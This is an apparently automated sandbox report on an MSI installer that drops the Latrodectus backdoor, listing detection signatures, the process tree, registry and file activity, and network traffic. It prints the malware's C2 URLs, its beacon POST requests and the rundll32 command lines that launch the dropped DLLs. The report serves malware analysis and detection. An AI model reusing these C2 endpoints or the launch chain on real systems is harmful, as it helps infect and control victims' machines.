Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ad.msi

Overview

General Information

Sample name:ad.msi
Analysis ID:1431884
MD5:666151c11b7899a0c764abe711d3f9b3
SHA1:35462114e096f4d307607d713136bfe38479870d
SHA256:8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
Tags:msi
Infos:

Detection

Latrodectus
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
PE file contains section with special chars
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 1424 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 5140 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6992 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding CFBB24A404B21769C19C85B2027D69FC C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 1008 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 02B62BF455D61FC50D15E7A41AF45BC1 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIB6D3.tmp (PID: 1936 cmdline: "C:\Windows\Installer\MSIB6D3.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 2664 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2224 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 5352 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Unidentified 111 (Latrodectus), LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111
{"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
SourceRuleDescriptionAuthorStrings
00000007.00000003.3230953855.000002095BA10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
    00000008.00000002.2135345986.000002268D6C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
      00000008.00000002.2135365322.000002268D6D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
        00000007.00000003.2974432949.000002095BA10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
          00000007.00000002.3348940328.000002095B810000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.26387cf0000.2.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
              7.2.rundll32.exe.2095b810000.1.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                6.2.rundll32.exe.26387ce0000.1.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                  6.2.rundll32.exe.26387ce0000.1.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                    8.2.rundll32.exe.2268d6d0000.1.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                      Click to see the 7 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 6.2.rundll32.exe.26387cf0000.2.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor:
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: "o
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: "
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: uau3"#%,''!
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: FfD!6""#'& )<
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: jB!
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor:
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: 3efal9#"
                      Source: 7.2.rundll32.exe.2095b820000.2.raw.unpackString decryptor: #kl&+=>4>@F[yz1
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,6_2_000000018003BC0C
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIB6D3.tmp, 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, MSIB6D3.tmp, 00000005.00000000.2105755236.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, ad.msi, 62b2e8.msi.2.dr, MSIB616.tmp.2.dr, MSIB6D3.tmp.2.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB539.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB539.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIB6D3.tmp, 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, MSIB6D3.tmp, 00000005.00000000.2105755236.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, ad.msi, 62b2e8.msi.2.dr, MSIB616.tmp.2.dr, MSIB6D3.tmp.2.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B6AF79 FindFirstFileExW,5_2_00B6AF79
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CFA350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_0000026387CFA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_0000026387CF1A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82A350 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_000002095B82A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B821A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_000002095B821A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6DA350 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_000002268D6DA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_000002268D6D1A08

                      Networking

                      barindex
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: Malware configuration extractorURLs: https://jarinamaers.shop/live/
                      Source: Malware configuration extractorURLs: https://wrankaget.site/live/
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 184Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 184Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 184Cache-Control: no-cache
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF8D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,6_2_0000026387CF8D90
                      Source: global trafficDNS traffic detected: DNS query: jarinamaers.shop
                      Source: unknownHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
                      Source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drString found in binary or memory: ftp://ftp%2desktop.ini
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: rundll32.exeString found in binary or memory: http://dr.f.360.cn/scan
                      Source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drString found in binary or memory: http://dr.f.360.cn/scanlist
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0O
                      Source: rundll32.exeString found in binary or memory: http://pconf.f.360.cn/safe_update.php
                      Source: rundll32.exeString found in binary or memory: http://pscan.f.360.cn/safe_update.php
                      Source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.drString found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
                      Source: rundll32.exeString found in binary or memory: http://sconf.f.360.cn/client_security_conf
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://t2.symcb.com0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://tl.symcd.com0&
                      Source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB616.tmp.2.dr, MSIB539.tmp.2.dr, MSIB6D3.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/.b
                      Source: rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/d
                      Source: rundll32.exe, 00000007.00000003.3230577585.0000020959F34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/fb
